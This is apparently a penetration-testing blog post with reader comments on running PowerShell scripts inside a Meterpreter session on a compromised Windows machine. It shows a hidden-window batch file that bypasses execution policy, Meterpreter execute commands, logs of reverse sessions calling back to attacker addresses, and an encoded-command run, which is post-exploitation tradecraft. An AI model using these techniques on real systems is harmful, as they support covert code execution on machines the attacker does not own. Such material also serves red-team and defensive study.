Part of it is the whole interactive shell-ness of powershell. so if you just type "powershell" once you drop to a cmd.exe you wont ever get the powershell prompt.
In a similar vain i've been unable to get any sort of combination of execute -f powershell.exe -a " blah blah" to work either. If anyone has the magic syntax i know lots of people that would be interested. (actually carlos perez hooked me up...answer below)
so, you can run powershell scripts via bat files and those execute just fine from within cmd.exe or from the "execute" command OR the encoded command [command].
C:\>type run_ps.bat
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -WindowStyle Hidden -File C:\do_neat_ps_stuff.ps1
Example:
meterpreter > execute -H -f cmd.exe -a '/c C:\runps.bat'
Process 28536 created.
meterpreter >
[*] 4.5.6.21:3863 Request received for /vLNL...
[*] 4.5.6.21:3863 Staging connection for target /vLNL received...
--snip--
[*] Patched Communication Timeout at offset 653608...
[*] Meterpreter session 9 opened (1.2.3.205:443 -> 4.5.6.21:3863) at 2012-09-09 16:29:30 -0400
carlos perez mentioned at Derbycon you can also do:
on linux download this script https://github.com/
you can use it to encode a script and then run it like so:
msf exploit(handler) >
[*] Sending stage (752128 bytes) to 192.168.1.225
[*] Meterpreter session 1 opened (192.168.1.100:4444 -> 192.168.1.225:49163) at 2012-09-17 15:58:33 -0400
msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > shell
Process 3416 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Users\carlos\Desktop> powershell.exe -encodedcommand dwByAGkAdABlAC0AaABvAHMAdAAgAG gAZQBsAGwAbwAgAHcAbwByAGwAZAA=
powershell.exe -encodedcommand dwByAGkAdABlAC0AaABvAHMAdAAgAG gAZQBsAGwAbwAgAHcAbwByAGwAZAA=
hello world
C:\Users\carlos\Desktop>
Would something like this work:
ReplyDeleteC:\WINDOWS\system32\cmd.exe /c powershell -command `"& {Set-ExecutionPolicy Unrestricted -Force}`" && powershell -File `"C:\sript1.ps1`"
Set-ExecutionPolicy requires admin privileges; on the other hand
ReplyDeletepowershell -NoProfile -ExecutionPolicy Unrestricted .\script.ps1
works fine even without admin privileges.
Note that the default PowerShell host (ConsoleHost) depends a lot on having a native console available - even executing a console application or trying to read input is done via the native console instead of using standard input/output streams.
An alternative might be to implement an alternative Host class, like my StreamHost.
I tried to implement that as a PowerShell script, but failed due to the fact I could not read from the standard
input stream without hanging the ConsoleHost that is used to execute the script.
Maybe someone else is more successful there.